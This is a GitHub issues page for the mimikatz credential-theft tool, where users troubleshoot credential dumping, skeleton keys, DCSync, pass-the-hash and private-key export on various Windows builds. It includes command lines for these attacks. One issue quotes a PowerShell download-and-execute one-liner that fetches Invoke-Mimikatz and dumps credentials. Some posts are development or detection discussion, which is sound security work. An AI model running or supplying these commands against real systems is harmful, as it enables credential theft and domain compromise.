mimikatz's People

Contributors

brandoncasaba, gentilkiwi, hubert3, matrix, slinv, timhir, vletoux, zhangyoufu

mimikatz's Issues

[Question] Log

How to create a Log at a specific location using a batch file?
I currently use "mimikatz.exe privilege::debug log sekurlsa::logonpasswords" and need a way to make the log save to U:/results/mimikatz.txt

cng patch on win8.1 32 bits

On win8.1 32 bits the pattern for the cng patch is
{0xf6, 0x43, 0x1c, 0x02, 0x75} but should be {0xf6, 0x47, 0x1c, 0x02, 0x75}.
Just patched it and it works well now.
I have not tested with win8.0 but maybe the two different patterns are linked to 32/64 bits instead of win8.0/win8.1 versions?

PTH Issue with Windows 10 / 1607

Hello Benjamin,

I get the error "kull_m_memory_copy (0x00000005)" when trying to use PTH with Windows 10 Build 10.0.14393 (Windows 10 Enterprise). Credential dumping works as usual.
I attached the log file, thanks for any advice you can give.
mimi.txt

Best regards,

Christoph

Visual Studio Pro 12 2013 compilation error.

Warning 2 warning C4996: 'wcsicmp': The POSIX name for this item is deprecated. Instead, use the ISO C++ conformant name: _wcsicmp. See online help for details. G:\mimikatz\mimikatz\modules\kuhl_m_sid.c 263 1 mimikatz

And I solved it with this: adding _CRT_NONSTDC_NO_DEPRECATE to the preprocessor definitions.

Does this happen only in VS2013? Thank you!

And thank you for your excellent work!!!

Mimikatz stopped working on Windows 10 1511 VSM with current patches

Salut Benjamin,

it seems that mimikatz 2.1 from 06 May stopped working on windows 10 systems with activated Virtual Secure Mode and current patch sets installed.

To be precise, the commands "logonpasswords" and "msv" have become broken.

We obtain an endless list of values for the LSA Isolated Data attribute "Encrypted", or alternatively a crash popup "mimikatz for Windows has stopped working".

We tried it with a Microsoft Surfacebook (with TPM 2.0)
Windows 10 Enterprise (US) version 1511
OS Version: 10586.0 and 10586.318
LsaIso Version: 10.0.586.0 and 10.0.10586.212

At the end we used the newest Windows Patch:
May 10, 2016 — KB3156421 (OS Build 10586.318)

This update includes quality improvements and security fixes. No new operating system features are being introduced in this update. Key changes include:
Fixed additional security issues with kernel mode drivers, remote procedure calls, the Microsoft Graphics Component, Internet Explorer 11, Microsoft Edge, Windows Shell, Windows Journal,
Virtual Secure Mode, Schannel, and Jscript.

Greetings from Germany,
Jürgen
M

Following is a session transcript of mimikatz which triggers the crash popup:

  .#####.   mimikatz 2.1 (x64) built on May  6 2016 01:28:44
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 19 modules * * */
ERROR kull_m_busylight_devices_get ; CreateFile (deviceHandle) (0x00000020)

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 6164539 (00000000:005e103b)
Session           : Interactive from 3
User Name         : admin
Domain            : COMPANY
Logon Server      : DC1
Logon Time        : 18.05.2016 13:17:47
SID               : S-1-5-21-504569365-2122958605-3922303804-1108
        msv :
         [00000003] Primary
         * Username : admin
         * Domain   : COMPANY
           * LSA Isolated Data: lmHash)
߶??¤ðgAÆL4$?ð?k¨ø,¨è¬??À*�Ÿ¶p?r?ßç®�~V�ý 'ÆK¡ó­?ó^è4  ±ö�-äb"£Ûæ
             Unk-Key  : 701857763ed94172143552903b20950a2fb1fc0488884e0d9ed4e1c3bc80ebd1838f736e3b7492dea90780caa6fd0100
             Encrypted:

error with skeleton key

hello, i ran mimikatz on windows server 2008 and i can't fix that

mimikatz #privilege::debug
Privilege '20' OK

mimikatz # misc::skeleton
ERROR kuhl_m_misc_skeleton ; kull_m_process_getVeryBasicModuleInformationsForName (0x00000000)

Windows Server 2003

I got this error:

mimikatz # sekurlsa::logonPasswords
ERROR kuhl_m_sekurlsa_nt5_init ; kull_m_memory_search
ERROR kuhl_m_sekurlsa_acquireLSA ; Local LSA library failed

ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

Hi, When trying to run mimikatz through the Invoke-Mimikatz.ps1 on a normal cmd it works fine,
when trying to run it through a python script such as:

command = "powershell.exe -ExecutionPolicy unrestricted ; IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:1234/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
os.system(command)

It fails and gives me the following output:

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (May 20 2014 08:55:05)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                    with  14 modules * * */


mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Modules informations

mimikatz(powershell) # exit
Bye!

Any help?

sid::add

Hi,

I am experimenting with sidhistory, but the sid module only seems to have the lookup and query function, the add and modify functions are missing in version 2.1 alpha 20160506.

Or, what am I missing?

Merci!

W2K3 lsass dump analysis error

lsass.exe dump from Windows 2003 Server

procdump.exe -accepteula -o  -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp"
mimikatz # sekurlsa::logonPasswords
Opening : 'lsass.dmp' file for minidump...
**ERROR kuhl_m_sekurlsa_acquireLSA ; Minidump pInfos->MajorVersion (5) != MIMIKATZ_NT_MAJOR_VERSION (6)

I use 32 bit version for x86.

Unable to read _LIST_ENTRY

Tested on Windows 8.1 Update 1 dump.

kd:x86> .load c:\mimilib.dll

  .#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Oct 10 2014 01:53:29)
 .## ^ ##.  Windows build 9600
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                  WinDBG extension ! * * */

===================================
#         * Kernel mode *         #
===================================
# Search for LSASS process
0: kd> !process 0 0 lsass.exe
# Then switch to its context
0: kd> .process /r /p <EPROCESS address>
# And finally :
0: kd> !mimikatz
===================================
#          * User mode *          #
===================================
0:000> !mimikatz
===================================

32.0: kd:x86> !process 0 0 lsass.exe
32.0: kd:x86> 
Unable to read _LIST_ENTRY @ fffff80194eb10a0 

Compilation error.

Error 1 error LNK2001: unresolved external symbol __imp__IsCharAlphaNumericW@4

thanks!

Problem...

mimikatz open in admin mode, Windows 8.1 x64.
What did I do wrong? I must extract this cert to sign over 2000 PDFs :/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'

 0. Lucyna  G   Key Container  : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
        Provider       : cryptoCertum3 CSP - profil bezpieczny
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'CURRENT_USER_My_0_Lucyna  GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
        Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'

 0. Lucyna  G   Key Container  : 7CCC75FA573611ED12C3BCB5FD80FB20E795C16E
        Provider       : cryptoCertum3 CSP - profil bezpieczny
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'CURRENT_USER_My_0_Lucyna  GERROR kuhl_m_crypto_ex
portPfx ; PFXExportCertStoreEx (0x80090010)
        Private export : KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFi
le (0x80090010)

DCSync fails against renamed domains

Running DCSync against domains that have been renamed ends with this message:

ERROR kuhl_m_lsadump_dcsync ; RPC Exception 0x00002191 (8593)

That error code stands for

The directory service cannot perform the requested operation because the servers involved are of different replication epochs (which is usually related to a domain rename that is in progress).

Probable cause: Mimikatz does not set the DRS_EXTENSIONS_INT::dwReplEpoch value, so it always defaults to 0. But each domain rename increments this counter on DCs and if the client and the server are not in the same epoch, the server simply refuses to send replication changes.

Possible solution: IDL_DRSBind should be called again with the epoch that the server returns in the first call, if it is not 0.

Win 7: Handle on memory

Hey everyone,

really nice program! Congrats and thank you very much!

Though, I'm getting an error on Windows 7:
When running privilege::debug I'm getting "ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege <20> c0000061"
and when running "sekurlsa::logonpasswords" I'm getting "ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory <0x00...5>"
Is there any get around?

Sekurlsa::LogonPasswords Fails on Windows 10 RS1 Builds

Hello -

We have a Windows 10 pre-RS1 build and it appears that mimikatz is unable to run Sekurlsa::LogonPasswords.

It fails with this error:

ERROR kuhl_m_sekurlsa_acquireLSA ; Logon list

Attached is a screenshot.

Is this a known issue? Please help us get this working.
mimikatz error

Abstract the console from the core library

Hi Ben!

I wanted to start a discussion about how we might work together to separate the UX/Console code from the core library that makes up the Mimikatz functionality. From there, I aim to wrap up the core library as a Meterpreter extension (ie. the kiwi extension that you already know!).

The reason I'm keen to do this here is because keeping the code in sync is a tough gig, especially given the rate at which you churn out features!

Are you open to teaming up and working on teasing the bits apart a little so that it's easier for us poor MSF folk to keep your latest and greatest stuff in Metasploit?

Cheers for all your awesome work, as always.

Official Mimikatz documentation

Hi all,

Is there any official documentation? Is there any appetite to create one?
An unofficial one can be found on the adsecurity blog.

Cheers,
Andreas

Easy way to build the correct PFX of howto ~ decrypt EFS files

Link is:
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files
I learned a lot from this, thank you so much!
And a little advice:
Installation and configuration of OpenSSL is very troublesome.
And I think there is an easier way:)
We can use cert2spc.exe and pvk2pfx.exe.
They are all included in the Microsoft Windows SDK and can be run separately.
The code is:

cert2spc.exe B53C6DE283C00203587A03DD3D0BF66E16969A55.der public.spc
pvk2pfx.exe -pvk raw_exchange_capi_0_ffb75517-bc6c-4a40-8f8b-e2c555e30e34.pvk -pi test -spc public.spc -pfx cert.pfx -f

I hope you will like it~

PTT and PTH Issue with Win10

Salut Benjamin,

we tried the newest builds of mimikatz 2.1 alpha 20160602 / 20160525

Windows 10 Build 10240 RTM: PTH ok; PTT not working
Windows 10 Build 10586 Version 1511: PTH not working; PTT not working
Windows 7 SP1 PTH ok; PTT ok

The output of mimikatz claims that everything went "ok" in all six cases.

Greetings,

goldfinger2

anti virus software thinks mimikatz is malware

I came across mimikatz when looking for a method to retrieve a "non exportable" key from a Windows computer. The anti virus software running on the computer I happened to be using to download mimikatz flagged the software as a virus. This isn't particularly compelling, but in the interest of self preservation, and somewhat on a whim, I decided to investigate a little more. I uploaded mimikatz.exe to VirusTotal, which reported this analysis:

https://www.virustotal.com/en/file/c3c336a23021b68b026bdf1642b220d88037039aa6d7f8e7d4d576cc38063088/analysis/1470356182/

I'm accustomed to the world of crappy anti virus software and constant false positives, but it was a bit surprising to see so many claiming mimikatz to be a trojan, rootkit, malware, etc., but not find any references to this in the various resources discussing its use.

Is this just an inevitable nuance, given the nature of this software, and happens to be little more than a coincidence? If nothing else, I thought the author[s]/community might be interested to know this [even if it's just for the sake of being informed on principle], assuming it's not something which has already been mentioned.

Mimikatz Kerberos export issue

I'm playing around with Kerberos dumping and cracking. I'm starting mimikatz and running "standard::base64" so that all the .kirbi files get exported using base64 encoding. However once I execute "kerberos::list /export" using base64, there are no output files in my directory. Mimikatz only saves .kirbi files when I DON'T use base64 encoding.

Golden ticket domain event log

Hey,

I have seen some clients increasingly detect golden ticket activity with mimikatz-generated tickets based on the event log login of a domain of "<3 eo.oe ~ ANSSI E>". I see that this value is hardcoded, located here:

RtlInitUnicodeString(&validationInfo.LogonDomainName, L"<3 eo.oe ~ ANSSI E>");

Is there a reason that this is hardcoded instead of dynamic? A providable domain name would be awesome here
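
The detection mentioned in the issue above, as an added example (not part of the original post and not code from the mimikatz project): it scans exported logon events for the hardcoded domain value and, going beyond the literal string, also flags any account domain outside an allowlist, since a literal match stops working once the value can be changed. The one-JSON-object-per-line export layout, the `KNOWN_DOMAINS` allowlist and the sample events are assumptions constructed for illustration.

```python
import json

# Logon-domain value quoted in the issue above (hardcoded in the tool's source).
HARDCODED_MARKER = "<3 eo.oe ~ ANSSI E>"

# Assumption: domain names that legitimately appear in this environment's
# logon events, lowercased. Replace with your own inventory (NetBIOS and DNS
# names, plus built-in authorities and local machine names you expect).
KNOWN_DOMAINS = {"company", "company.local", "nt authority", "window manager"}

# Windows Security event IDs and the fields carrying the account domain/user.
DOMAIN_FIELD = {4624: "TargetDomainName", 4672: "SubjectDomainName"}
USER_FIELD = {4624: "TargetUserName", 4672: "SubjectUserName"}

# Constructed sample input: one JSON object per line, as a SIEM export might
# produce. None of these events come from the original page.
SAMPLE_LINES = [
    '{"EventID": 4624, "TargetUserName": "admin", "TargetDomainName": "COMPANY"}',
    '{"EventID": 4624, "TargetUserName": "Administrator", "TargetDomainName": "<3 eo.oe ~ ANSSI E>"}',
    '{"EventID": 4672, "SubjectUserName": "Administrator", "SubjectDomainName": "<3 eo.oe ~ ANSSI E>"}',
    '{"EventID": 4624, "TargetUserName": "svc_backup", "TargetDomainName": "CORP-OLD"}',
    'this line is not JSON',
    '{"EventID": 5156, "Application": "svchost.exe"}',
]


def classify(event):
    """Return a finding label for one parsed event, or None if nothing stands out."""
    field = DOMAIN_FIELD.get(event.get("EventID"))
    if field is None:
        return None  # event type not covered by this check
    domain = (event.get(field) or "").strip()
    if domain == HARDCODED_MARKER:
        return "hardcoded-marker"
    if domain in ("", "-"):
        return None  # no domain recorded; out of scope for this check
    if domain.lower() not in KNOWN_DOMAINS:
        return "unknown-domain"
    return None


def scan(lines):
    """Scan JSON-lines events; return (findings, number_of_unparseable_lines)."""
    findings, skipped = [], 0
    for lineno, line in enumerate(lines, 1):
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            skipped += 1  # count bad lines instead of silently losing them
            continue
        if not isinstance(event, dict):
            skipped += 1
            continue
        label = classify(event)
        if label:
            event_id = event["EventID"]
            findings.append({
                "line": lineno,
                "event_id": event_id,
                "user": event.get(USER_FIELD[event_id]),
                "domain": event.get(DOMAIN_FIELD[event_id]),
                "finding": label,
            })
    return findings, skipped


if __name__ == "__main__":
    results, bad = scan(SAMPLE_LINES)
    for r in results:
        print(r)
    print("unparseable lines:", bad)
```

The allowlist branch will be noisy until local machine names and built-in authorities seen in your own logs are added to it.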

PtH: Running a command with parameters

Hi Ben,
I just wonder if you could add support for passing command line parameters to the binaries executed by sekurlsa::pth. Or have I just missed this feature?
And thx again for your great work.

DCSync does not work with PAM feature enabled

Hi @gentilkiwi,

knowing that DCSync had problem with AD Recycle Bin being enabled, I tried it against a Windows Server 2016 TP5 DC with the Privileged Access Management Feature on, just out of curiosity. And guess what, it ends with error 8236 (The server does not support the requested critical extension), just as my own DSInternals does.

The solution will involve more than just fun with flags, as it was with DRS_EXT_RECYCLE_BIN, because the updated Doc states this: GR9 (DRS_EXT_GETCHGREPLY_V9, 0x00000100): If present, signifies that the DC supports DRS_MSG_GETCHGREPLY_V9. The DRS_MSG_GETCHGREPLY_V9 message basically adds link expiration timestamp to DRS_MSG_GETCHGREPLY_V6.

@asolino This issue most probably affects Impacket, too, though I cannot verify it right now.

Cheers
Michael

Windows 8.1

Erm, hello, I'm trying to get the password to a lappy running on Windows 8.1, running the current version of mimikatz on a 64-bit.
Before (Windows 8), typing in Privilege::debug followed by sekurlsa::Logonpasswords would work.
Now (Windows 8.1) I'm getting a null for the password.
Could you help me by giving the commands to find the password for 8.1? Please explain this to me, I have no idea how any of this works.
Thanks.

Mimikatz stopped working on Windows 10 1607 VSM

Salut Benjamin,

As we expect, mimikatz 2.1 from 08 August doesn't work with the Windows 10 Build 1607 and Credential Guard.
Windows 10 Enterprise (US) version 1607
OS Version: 14393.10
LsaIso Version: 10.0.14393.0

We attached the lsass dump file created by the taskmanager.

Greetings from Germany,

Jürgen
lsass-1607.zip

Unable to export private key

Hi,

I have a certificate with a private key marked as non-exportable. I use mimikatz to export the certificate:

mimikatz # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'

0. xxxxx
        Key Container  : !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
        Provider       : Symantec PKI Client CSP
        Provider type  : RSA_FULL (1)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'CURRENT_USER_My_0_ xxxxx.der'
        Private export : OK - 'CURRENT_USER_My_0_ xxxxx.pfx'

I then use openssl to extract the public certificate and private key:

openssl pkcs12 -in my.pfx -out cert.pem -nokeys
openssl pkcs12 -in my.pfx -out key.pem -nocerts

The resulting cert.pem looks fine but key.pem has size 0. When I run:

certutil -user -store My

I get the following output:

My
================ Certificate 0 ================
Serial Number: 73f1964b9c30379490fa6db433e9ea96
Issuer: CN=xxxxx, O=xxxxx
 NotBefore: 2/19/2016 4:00 PM
 NotAfter: 2/19/2017 3:59 PM
Subject: OU=MULTI-ALLOWED, OU=RACERT, CN=xxxxx, CN=xxxxx
Non-root Certificate
Template:
Cert Hash(sha1): a4 2a 9e 45 95 8d 92 c6 43 d5 42 a3 c4 b6 19 af 21 fc 3c f7
  Key Container = !A42A9E45958D92C643D542A3C4B619AF21FC3CF7
  Provider = Symantec PKI Client CSP
Private key is NOT exportable
ERROR: Could not verify certificate public key against private key
CertUtil: -store command completed successfully.

Do you know why I cannot export the private key? Thanks.

kirbikator and KrbCredExport does not recognize golden tickets.

Since this change.... 0666f21

KrbCredExport (https://github.com/rvazarkar/KrbCredExport) and "kirbikator" do not recognize the golden ticket format, obviously generated with mimikatz

C:\Users\yo\mimikatz\x64>kirbikator ccache cid63212.kirbi

  .#####.   KiRBikator 1.1 (x86) built on Jan 18 2016 01:57:51
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( [email protected] )
 '## v ##'   http://blog.gentilkiwi.com                      (oe.eo)
  '#####'                                                     * * */

Destination : MIT Credential Cache (simple)
 < cid63212.kirbi : format not recognized!

AND

C:\Users\yo\mimikatz\x64>KrbCredExport.py cid63212.kirbi cid63212.ccache

Ticket File Found, Converting to ccache
Traceback (most recent call last):
  File "C:\Program Files (x86)\Python27\Scripts\KrbConvert.py", line 52, in <module>
    KrbCred.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 88, in parsefile
    self.ticketpart.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 57, in parsefile
    self.encpart.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredstructs.py", line 24, in parsefile
    self.krbcredinfo.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 300, in parsefile
    self.starttime.parsefile(f)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 185, in parsefile
    self.time = Time.convert_to_unix(strtime)
  File "C:\Program Files (x86)\Python27\Scripts\krbcredinfostructs.py", line 170, in convert_to_unix
    t = datetime.datetime.strptime(timestr[:-1], '%Y%m%d%H%M%S')
  File "C:\Program Files (x86)\Python27\lib\_strptime.py", line 332, in _strptime
    (data_string, format))
ValueError: time data "\x1c\xa7\xcc(A'\xfa\xef\xa0\x16\xb1*B\x95" does not match format '%Y%m%d%H%M%S'

C:\Users\yo\mimikatz\x64>python --version
Python 2.7.12

Windows 10 x64 ver 1511

thank you!!

Windows 10 null password

Just curious about why Windows 10 passwords are showing up as null. I was trying to remember how you get around it showing null, but forgot again why the password shows up null. Someone refresh my memory again.

Ran it as Admin, had SmartScreen off and turned off Bitdefender, but I think there was something you had to do to get it to show the password.

Privilege debug error

I try to use mimikatz on Windows 10 Pro N (Build 1511) on VirtualBox but it gives me the following error when I use privilege::debug and I can't begin my analysis:
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061

'Access denied' alert when trying to open log file

Thanks for the great tool 👍

I am unable to open generated log file when using "mimikatz 2.1 (x64) built on May 25 2016 00:19:15" as below, getting 'Access Denied' alert


mimikatz.exe "log b3.txt" "sekurlsa::minidump test.dmp" "sekurlsa::logonPasswords full" "exit"

However if I use it as below, I am able to open generated log file


mimikatz # log b5.txt
Using 'b5.txt' for logfile : OK

mimikatz # sekurlsa::minidump procdump_64_192.168.56.50.dmp
Switch to MINIDUMP : 'procdump_64_192.168.56.50.dmp'

mimikatz # sekurlsa::logonPasswords full
Opening : 'procdump_64_192.168.56.50.dmp' file for minidump...

Authentication Id : 0 ; 1665464 (00000000:001969b8)
Session : Interactive from 0
User Name : Administrator

-----crop----

Exporting certificates of user

I'm trying to export user certificates from a system, but I'm ending up with the error kuhl_m_crypto_l_certificates ; CertOpenStore.

crypto::capi, privilege::debug and crypto::cng were successful.

Cannot export key from wildcard cert

Hello. Excellent tool!

When I export a wildcard certificate from My store it appears to export to a pfx properly but when I try to retrieve the private key it's just blank.

image

But after reimporting I see this (there's no private key):

image

Sorry for blurring out so much...

cert is exported but without priv key

First of all this seems to be a great tool, thanks.

When I try to export my certificate it is exported without the private key, which doesn't help me.

System info: Windows 2008 Server R2 64bits
mimikatz 2.1 x64 (downloaded today)

At some point I get error:
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)

I made sure I opened the command prompt using "Run as Administrator" and went over UAC. Because of that I'm assuming I have ACL permissions on the private keys.

I am sure the key is not there because when I use openssl to verify pfx (openssl pkcs12 -info) the BEGIN ENCRYPTED PRIVATE KEY is not there. And when I try to extract the key to a .pem (openssl pkcs12 -in pfx -out pem) the output file is empty.

Can you help?

Output (broken lines kept, sorry):

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # crypto::certificates /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE /store:My /export
 * System Store  : 'CERT_SYSTEM_STORE_LOCAL_MACHINE' (0x00020000)
 * Store         : 'My'

 0. wantedCert.com
        Key Container  : {some_key}
        Provider       : Microsoft Enhanced Cryptographic Provider v1.0
        Provider type  : RSA_FULL (1)
ERROR kuhl_m_crypto_l_certificates ; CryptAcquireCertificatePrivateKey (0x80090011)
        Public export  : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.der'
        Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_0_wantedCert.com.pfx'

 1. WMSvc-IISDefaultCertificate
        Key Container  : WMSvc Certificate Key Container
        Provider       : Microsoft RSA SChannel Cryptographic Provider
        Provider type  : RSA_SCHANNEL (12)
        Type           : AT_KEYEXCHANGE (0x00000001)
        Exportable key : YES
        Key size       : 2048
        Public export  : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.der'
        Private export : OK - 'CERT_SYSTEM_STORE_LOCAL_MACHINE_My_1_WMSvc-IISDefaultCertificate.pfx'

Big Issue on Win 10 HELP

On Win 10, if you open mimikatz and try to get the passwords, you cannot get them because it is impossible. I tried it all: opening as administrator,
-privileges::debug
"privilege 20 OK"
-sekurlsa::logonpasswords
"ERROR kuhl_m_sekurlsa_acquireLSA ; Modules Informations"
-lsadump::cache
"Domain: "
"Syskey: ***
****************"
"ERROR kuhl_m_lsadump_secretsOrCache ; kull_m_registry_regOpenKeyEx (SECURITY) (0x00000005)"
-lsadump::sam
"Domain: ***
"
"Syskey: ****************************"
"ERROR kuhl_m_lsadump_getUsersandSamKey ; kull_m_registry_regOpenKeyEx SAM accounts (0x00000005)"

Pls gentilkiwi help me.

Unable to patch CNG

I get an error when trying to patch CNG:

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
ERROR kull_m_patch_genericProcessOrServiceFromBuild ; kull_m_patch (0x00000005)

I tried to run mimikatz as Administrator and SYSTEM (via PsExec).

French to English translations

Hi,

I'd like to raise a feature request to support both English and French natively. I'd like to offer to spend the time to translate any French text to English. Is there a simple way to extract all text currently being used and to merge translations back in once done? Also happy to translate any documentation that is not yet in English.

Please let me know if this will be possible!

Cheers,
-T

ccache to kirbi file parser for Linux

Since Mimikatz is able to inject the ccache files generated in Linux, would it be possible to write a parser that can run under Linux to generate .kirbi files from the ccache file? I've tried to look into the code (kuhl_m_kerberos_ccache), but since nothing is commented I'm having a hard time to get into it.

Remote Credential Guard Issue

Salut Benjamin,

the new mimikatz version from Aug 12 is working with Windows Build 1607 with and without Credential Guard. :-)
But we have a little issue together with Remote Credential Guard (RCG).

We used the following setup:
Source (RPC Client) Windows Build 1607 with Credential Guard protected
Target Windows Build 1607 without Credential Guard
We made an RPC connection with the parameter "/remoteguard" to the target.
After running mimikatz on the target machine it will crash. (See attachments)
Maybe the problem is that the TGT-ticket on the target machine is a copy of the TGT-ticket of the source machine but without the session key. This is why the target must call back to the source to use his session key to decrypt the response from the TGS of the new service tickets.

mimikatz-remote-cred-bug
mimikatz-remote-cred-bug2

Greetings from Germany

Juergen
